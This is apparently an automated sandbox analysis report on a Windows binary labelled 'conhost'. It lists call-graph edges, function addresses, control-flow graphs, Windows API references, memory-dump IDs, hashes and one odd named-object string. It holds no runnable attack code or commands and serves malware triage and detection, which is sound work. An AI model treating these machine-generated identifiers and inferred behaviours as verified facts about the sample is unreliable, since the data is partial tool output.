2501 140001394 2 API calls 2500->2501 2502 14000153f 2501->2502 2503 140001394 2 API calls 2502->2503 2504 14000154e 2503->2504 2505 140001394 2 API calls 2504->2505 2506 14000155d 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000156c 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000157b 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000158a 2511->2512 2513 140001394 2 API calls 2512->2513 2514 140001599 2513->2514 2515 140001394 2 API calls 2514->2515 2516 1400015a8 2515->2516 2517 140001394 2 API calls 2516->2517 2518 1400015b7 2517->2518 2519 140001394 2 API calls 2518->2519 2520 1400015c6 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015d5 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015e4 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015f3 2525->2526 2526->2218 2527 140001440 2526->2527 2528 140001394 2 API calls 2527->2528 2529 14000144f 2528->2529 2530 140001394 2 API calls 2529->2530 2531 14000145e 2530->2531 2532 140001394 2 API calls 2531->2532 2533 14000146d 2532->2533 2534 140001394 2 API calls 2533->2534 2535 14000147c 2534->2535 2536 140001394 2 API calls 2535->2536 2537 14000148b 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000149a 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400014a9 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400014b8 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400014c7 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400014d6 2546->2547 2548 1400014e5 2547->2548 2549 140001394 2 API calls 2547->2549 2550 140001394 2 API calls 2548->2550 2549->2548 2551 1400014ef 2550->2551 2552 1400014f4 2551->2552 2553 140001394 2 API calls 2551->2553 2554 140001394 2 API calls 2552->2554 2553->2552 2555 1400014fe 2554->2555 2556 140001503 2555->2556 2557 140001394 2 API calls 2555->2557 2558 140001394 2 API calls 2556->2558 2557->2556 2559 14000150d 2558->2559 2560 140001394 2 API calls 2559->2560 2561 140001512 2560->2561 2562 140001394 2 API calls 2561->2562 2563 140001521 2562->2563 2564 140001394 2 API calls 2563->2564 2565 140001530 2564->2565 2566 140001394 2 API calls 2565->2566 2567 14000153f 2566->2567 2568 140001394 2 API calls 2567->2568 2569 14000154e 2568->2569 2570 140001394 2 API calls 2569->2570 2571 14000155d 2570->2571 2572 140001394 2 API calls 2571->2572 2573 14000156c 2572->2573 2574 140001394 2 API calls 2573->2574 2575 14000157b 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000158a 2576->2577 2578 140001394 2 API calls 2577->2578 2579 140001599 2578->2579 2580 140001394 2 API calls 2579->2580 2581 1400015a8 2580->2581 2582 140001394 2 API calls 2581->2582 2583 1400015b7 2582->2583 2584 140001394 2 API calls 2583->2584 2585 1400015c6 2584->2585 2586 140001394 2 API calls 2585->2586 2587 1400015d5 2586->2587 2588 140001394 2 API calls 2587->2588 2589 1400015e4 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015f3 2590->2591 2591->2218 2591->2226 2593 1400014e5 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014ef 2595->2596 2597 1400014f4 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 1400014fe 2599->2600 2601 140001503 2600->2601 2602 140001394 2 API calls 2600->2602 2603 140001394 2 API calls 2601->2603 2602->2601 2604 14000150d 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001512 2605->2606 2607 140001394 2 API calls 2606->2607 2608 140001521 2607->2608 2609 140001394 2 API calls 2608->2609 2610 140001530 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000153f 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000154e 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000155d 2615->2616 2617 140001394 2 API calls 2616->2617 2618 14000156c 2617->2618 2619 140001394 2 API calls 2618->2619 2620 14000157b 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000158a 2621->2622 2623 140001394 2 API calls 2622->2623 2624 140001599 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015a8 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015b7 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015c6 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015d5 2631->2632 2633 140001394 2 API calls 2632->2633 2634 1400015e4 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015f3 2635->2636 2636->2235 2638 140001394 2 API calls 2637->2638 2639 14000158a 2638->2639 2640 140001394 2 API calls 2639->2640 2641 140001599 2640->2641 2642 140001394 2 API calls 2641->2642 2643 1400015a8 2642->2643 2644 140001394 2 API calls 2643->2644 2645 1400015b7 2644->2645 2646 140001394 2 API calls 2645->2646 2647 1400015c6 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015d5 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015e4 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015f3 2652->2653 2653->2235 2655 140001394 2 API calls 2654->2655 2656 1400015b7 2655->2656 2657 140001394 2 API calls 2656->2657 2658 1400015c6 2657->2658 2659 140001394 2 API calls 2658->2659 2660 1400015d5 2659->2660 2661 140001394 2 API calls 2660->2661 2662 1400015e4 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400015f3 2663->2664 2664->2235 2666 140001394 2 API calls 2665->2666 2667 140001530 2666->2667 2668 140001394 2 API calls 2667->2668 2669 14000153f 2668->2669 2670 140001394 2 API calls 2669->2670 2671 14000154e 2670->2671 2672 140001394 2 API calls 2671->2672 2673 14000155d 2672->2673 2674 140001394 2 API calls 2673->2674 2675 14000156c 2674->2675 2676 140001394 2 API calls 2675->2676 2677 14000157b 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000158a 2678->2679 2680 140001394 2 API calls 2679->2680 2681 140001599 2680->2681 2682 140001394 2 API calls 2681->2682 2683 1400015a8 2682->2683 2684 140001394 2 API calls 2683->2684 2685 1400015b7 2684->2685 2686 140001394 2 API calls 2685->2686 2687 1400015c6 2686->2687 2688 140001394 2 API calls 2687->2688 2689 1400015d5 2688->2689 2690 140001394 2 API calls 2689->2690 2691 1400015e4 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015f3 2692->2693 2693->2235 2695 140001394 2 API calls 2694->2695 2696 140001431 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001440 2697->2698 2699 140001394 2 API calls 2698->2699 2700 14000144f 2699->2700 2701 140001394 2 API calls 2700->2701 2702 14000145e 2701->2702 2703 140001394 2 API calls 2702->2703 2704 14000146d 2703->2704 2705 140001394 2 API calls 2704->2705 2706 14000147c 2705->2706 2707 140001394 2 API calls 2706->2707 2708 14000148b 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000149a 2709->2710 2711 140001394 2 API calls 2710->2711 2712 1400014a9 2711->2712 2713 140001394 2 API calls 2712->2713 2714 1400014b8 2713->2714 2715 140001394 2 API calls 2714->2715 2716 1400014c7 2715->2716 2717 140001394 2 API calls 2716->2717 2718 1400014d6 2717->2718 2719 1400014e5 2718->2719 2720 140001394 2 API calls 2718->2720 2721 140001394 2 API calls 2719->2721 2720->2719 2722 1400014ef 2721->2722 2723 1400014f4 2722->2723 2724 140001394 2 API calls 2722->2724 2725 140001394 2 API calls 2723->2725 2724->2723 2726 1400014fe 2725->2726 2727 140001503 2726->2727 2728 140001394 2 API calls 2726->2728 2729 140001394 2 API calls 2727->2729 2728->2727 2730 14000150d 2729->2730 2731 140001394 2 API calls 2730->2731 2732 140001512 2731->2732 2733 140001394 2 API calls 2732->2733 2734 140001521 2733->2734 2735 140001394 2 API calls 2734->2735 2736 140001530 2735->2736 2737 140001394 2 API calls 2736->2737 2738 14000153f 2737->2738 2739 140001394 2 API calls 2738->2739 2740 14000154e 2739->2740 2741 140001394 2 API calls 2740->2741 2742 14000155d 2741->2742 2743 140001394 2 API calls 2742->2743 2744 14000156c 2743->2744 2745 140001394 2 API calls 2744->2745 2746 14000157b 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000158a 2747->2748 2749 140001394 2 API calls 2748->2749 2750 140001599 2749->2750 2751 140001394 2 API calls 2750->2751 2752 1400015a8 2751->2752 2753 140001394 2 API calls 2752->2753 2754 1400015b7 2753->2754 2755 140001394 2 API calls 2754->2755 2756 1400015c6 2755->2756 2757 140001394 2 API calls 2756->2757 2758 1400015d5 2757->2758 2759 140001394 2 API calls 2758->2759 2760 1400015e4 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015f3 2761->2762 2762->2235 2764 140001394 2 API calls 2763->2764 2765 140001440 2764->2765 2766 140001394 2 API calls 2765->2766 2767 14000144f 2766->2767 2768 140001394 2 API calls 2767->2768 2769 14000145e 2768->2769 2770 140001394 2 API calls 2769->2770 2771 14000146d 2770->2771 2772 140001394 2 API calls 2771->2772 2773 14000147c 2772->2773 2774 140001394 2 API calls 2773->2774 2775 14000148b 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000149a 2776->2777 2778 140001394 2 API calls 2777->2778 2779 1400014a9 2778->2779 2780 140001394 2 API calls 2779->2780 2781 1400014b8 2780->2781 2782 140001394 2 API calls 2781->2782 2783 1400014c7 2782->2783 2784 140001394 2 API calls 2783->2784 2785 1400014d6 2784->2785 2786 1400014e5 2785->2786 2787 140001394 2 API calls 2785->2787 2788 140001394 2 API calls 2786->2788 2787->2786 2789 1400014ef 2788->2789 2790 1400014f4 2789->2790 2791 140001394 2 API calls 2789->2791 2792 140001394 2 API calls 2790->2792 2791->2790 2793 1400014fe 2792->2793 2794 140001503 2793->2794 2795 140001394 2 API calls 2793->2795 2796 140001394 2 API calls 2794->2796 2795->2794 2797 14000150d 2796->2797 2798 140001394 2 API calls 2797->2798 2799 140001512 2798->2799 2800 140001394 2 API calls 2799->2800 2801 140001521 2800->2801 2802 140001394 2 API calls 2801->2802 2803 140001530 2802->2803 2804 140001394 2 API calls 2803->2804 2805 14000153f 2804->2805 2806 140001394 2 API calls 2805->2806 2807 14000154e 2806->2807 2808 140001394 2 API calls 2807->2808 2809 14000155d 2808->2809 2810 140001394 2 API calls 2809->2810 2811 14000156c 2810->2811 2812 140001394 2 API calls 2811->2812 2813 14000157b 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000158a 2814->2815 2816 140001394 2 API calls 2815->2816 2817 140001599 2816->2817 2818 140001394 2 API calls 2817->2818 2819 1400015a8 2818->2819 2820 140001394 2 API calls 2819->2820 2821 1400015b7 2820->2821 2822 140001394 2 API calls 2821->2822 2823 1400015c6 2822->2823 2824 140001394 2 API calls 2823->2824 2825 1400015d5 2824->2825 2826 140001394 2 API calls 2825->2826 2827 1400015e4 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015f3 2828->2829 2829->2235

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_00000001400057E1 1 Function_0000000140001AE4 33 Function_0000000140001D40 1->33 76 Function_0000000140001BA0 1->76 2 Function_00000001400014E5 72 Function_0000000140001394 2->72 3 Function_00000001400010F0 4 Function_00000001400030F1 5 Function_00000001400014F4 5->72 6 Function_0000000140002500 7 Function_0000000140001800 65 Function_0000000140002290 7->65 8 Function_0000000140001000 9 Function_0000000140001E00 8->9 39 Function_0000000140001750 8->39 80 Function_0000000140001FB0 8->80 87 Function_0000000140001FC0 8->87 10 Function_0000000140002F00 55 Function_0000000140001370 10->55 11 Function_0000000140005801 12 Function_0000000140005901 13 Function_0000000140001503 13->72 14 Function_0000000140001404 14->72 15 Function_0000000140002104 16 Function_0000000140001E10 17 Function_0000000140005D10 37 Function_0000000140005A50 17->37 18 Function_0000000140003110 19 Function_0000000140001512 19->72 20 Function_0000000140002420 21 Function_0000000140002320 22 Function_0000000140001521 22->72 23 Function_0000000140005721 24 Function_0000000140005821 25 Function_0000000140001422 25->72 26 Function_0000000140001530 26->72 27 Function_0000000140005A30 28 Function_0000000140003130 29 Function_0000000140001431 29->72 30 Function_000000014000153F 30->72 31 Function_0000000140001440 31->72 32 Function_0000000140001140 48 Function_0000000140001160 32->48 33->65 34 Function_0000000140005841 35 Function_0000000140001F47 56 Function_0000000140001870 35->56 36 Function_0000000140002050 38 Function_0000000140003150 38->10 38->13 38->22 38->25 38->26 38->29 38->30 38->31 38->37 44 Function_000000014000145E 38->44 46 Function_0000000140002660 38->46 52 Function_000000014000156C 38->52 53 Function_000000014000146D 38->53 38->55 62 Function_000000014000157B 38->62 77 Function_00000001400015A8 38->77 78 Function_00000001400014A9 38->78 86 Function_00000001400016C0 38->86 97 Function_00000001400014D6 38->97 100 Function_00000001400026E0 38->100 40 Function_0000000140001650 41 Function_0000000140005751 42 Function_0000000140003051 43 Function_000000014000155D 43->72 44->72 45 Function_0000000140002460 47 Function_0000000140005A60 47->37 48->38 48->48 48->56 63 Function_0000000140001880 48->63 64 Function_0000000140001F90 48->64 48->86 49 Function_0000000140001760 101 Function_00000001400020E0 49->101 50 Function_0000000140005861 51 Function_0000000140001E65 51->56 52->72 53->72 54 Function_000000014000216F 57 Function_0000000140001A70 57->33 57->76 58 Function_0000000140003070 59 Function_0000000140005870 60 Function_0000000140005771 61 Function_0000000140005971 62->72 63->20 63->33 63->46 63->76 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005791 70 Function_0000000140005891 71 Function_0000000140005991 72->17 72->47 73 Function_0000000140002194 73->56 74 Function_000000014000219E 75 Function_0000000140001FA0 76->33 79 Function_00000001400023B0 76->79 93 Function_00000001400024D0 76->93 77->72 78->72 81 Function_00000001400022B0 82 Function_00000001400026B0 83 Function_00000001400030B1 84 Function_00000001400057B1 85 Function_0000000140001AB3 85->33 85->76 88 Function_00000001400058C1 89 Function_0000000140001AC3 89->33 89->76 90 Function_00000001400014C7 90->72 91 Function_00000001400026D0 92 Function_0000000140001FD0 94 Function_00000001400017D0 95 Function_00000001400059D1 96 Function_0000000140001AD4 96->33 96->76 97->72 98 Function_00000001400022E0 99 Function_00000001400017E0 99->101 100->2 100->5 100->13 100->19 100->37 100->43 100->44 100->46 100->55 100->78 100->90

                                                      Executed Functions

                                                      Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtQueryOpenSubKeys.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: KeysOpenQuery
                                                      • String ID:
                                                      • API String ID: 411376803-0
                                                      • Opcode ID: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                      • Instruction ID: 0a01b27cd887de470f3a79e9e26df08ee21fc81555de9c41fe10c45f52e6a1ec
                                                      • Opcode Fuzzy Hash: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                      • Instruction Fuzzy Hash: CAF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                      Non-executed Functions

                                                      Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 311 1400026e0-14000273b call 140002660 315 140002741-14000274b 311->315 316 14000280e-14000285e call 14000155d 311->316 318 140002774-14000277a 315->318 321 140002953-14000297b call 1400014c7 316->321 322 140002864-140002873 316->322 318->316 320 140002780-140002787 318->320 323 140002789-140002792 320->323 324 140002750-140002752 320->324 339 140002986-1400029c8 call 140001503 call 140005a50 321->339 340 14000297d 321->340 325 140002eb7-140002ef4 call 140001370 322->325 326 140002879-140002888 322->326 329 140002794-1400027ab 323->329 330 1400027f8-1400027fb 323->330 327 14000275a-14000276e 324->327 331 1400028e4-14000294e wcsncmp call 1400014e5 326->331 332 14000288a-1400028dd 326->332 327->316 327->318 335 1400027f5 329->335 336 1400027ad-1400027c2 329->336 330->327 331->321 332->331 335->330 341 1400027d0-1400027d7 336->341 349 140002e49-140002e84 call 140001370 339->349 350 1400029ce-1400029d5 339->350 340->339 342 1400027d9-1400027f3 341->342 343 140002800-140002809 341->343 342->335 342->341 343->327 353 1400029d7-140002a0c 349->353 357 140002e8a 349->357 352 140002a13-140002a43 wcscpy wcscat wcslen 350->352 350->353 355 140002a45-140002a76 wcslen 352->355 356 140002a78-140002aa5 352->356 353->352 358 140002aa8-140002abf wcslen 355->358 356->358 357->352 359 140002ac5-140002ad8 358->359 360 140002e8f-140002eab call 140001370 358->360 362 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 359->362 363 140002ada-140002aee 359->363 360->325 381 140002dfd-140002e1b call 140001512 362->381 382 140002e20-140002e48 call 14000145e 362->382 363->362 381->382
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: wcslen$wcscatwcscpywcsncmp
                                                      • String ID: 0$X$\BaseNamedObjects\bgkmfasgruyrxqsgqfqwhmlu$`
                                                      • API String ID: 597572034-1976855235
                                                      • Opcode ID: 243c8d01a9e3a3d67ec353463df2f12041f933e2410885e99c806b691f35c182
                                                      • Instruction ID: 028e16dcd7b7405ede839f830d541fceea9bce4e332de464088775d94138c9c7
                                                      • Opcode Fuzzy Hash: 243c8d01a9e3a3d67ec353463df2f12041f933e2410885e99c806b691f35c182
                                                      • Instruction Fuzzy Hash: F91248B2608BC085E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700
                                                      Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                      • Instruction ID: 070ab519a2817fabac9d3928640a8dfc31f1868cd1d81c957eb574597805d415
                                                      • Opcode Fuzzy Hash: c4d67565a20342ade335354fc59ecc84fd5eb261badca5579fbb5ee24efd579b
                                                      • Instruction Fuzzy Hash: E05113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F849121FB4D873B6DE38C4958300
                                                      Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 433 140001bf3-140001c02 430->433 434 140001be0-140001be7 430->434 437 140001cf4-140001cfe call 140001d40 431->437 438 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->438 433->434 436 140001c04 433->436 434->430 434->431 439 140001cd7-140001cf3 memcpy 436->439 442 140001d03-140001d1e call 140001d40 437->442 438->442 445 140001c72-140001c79 438->445 446 140001d23-140001d38 GetLastError call 140001d40 442->446 447 140001c7b-140001c7e 445->447 448 140001c8e-140001c97 445->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->439 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                      • Instruction ID: 568161692b5c4f8a705951d6b28697fc04e6310cca5c6e1950853b3621b7b2e0
                                                      • Opcode Fuzzy Hash: 79a2a9d4ac031f2ce5fafed73baa3885646a95f71b85d3d4911c59ac99310c7d
                                                      • Instruction Fuzzy Hash: 334143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700
                                                      Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                      • String ID:
                                                      • API String ID: 926137887-0
                                                      • Opcode ID: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                      • Instruction ID: f187cb6aa2ea60f0469956b9f5200469d8ecfadf0b7e99ee31c93393cd0a6912
                                                      • Opcode Fuzzy Hash: 90a19a65f5c6fc128aa79077d7c42a4fb441e5ead76d492d121654b50c4905b0
                                                      • Instruction Fuzzy Hash: 1521E0B1715A1292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300
                                                      Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 491 140001b87-140001b98 call 140001d40 488->491 492 140001a2c-140001a37 488->492 493 140001970-14000199c call 140001ba0 489->493 490->476 494 1400019a8-1400019c1 490->494 492->490 495 140001a3d-140001a5f 492->495 493->490 498 1400019df-1400019e7 494->498 501 140001a7d-140001a97 495->501 499 1400019e9-140001a0d VirtualProtect 498->499 500 1400019d0-1400019dd 498->500 499->500 500->476 500->498 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->491 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341729295.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341781098.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_63_2_140000000_conhost.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                      • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                      • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                      Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000003F.00000002.296341624581.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 0000003F.00000002.296341573800.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000003F.00000002.296341671776.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
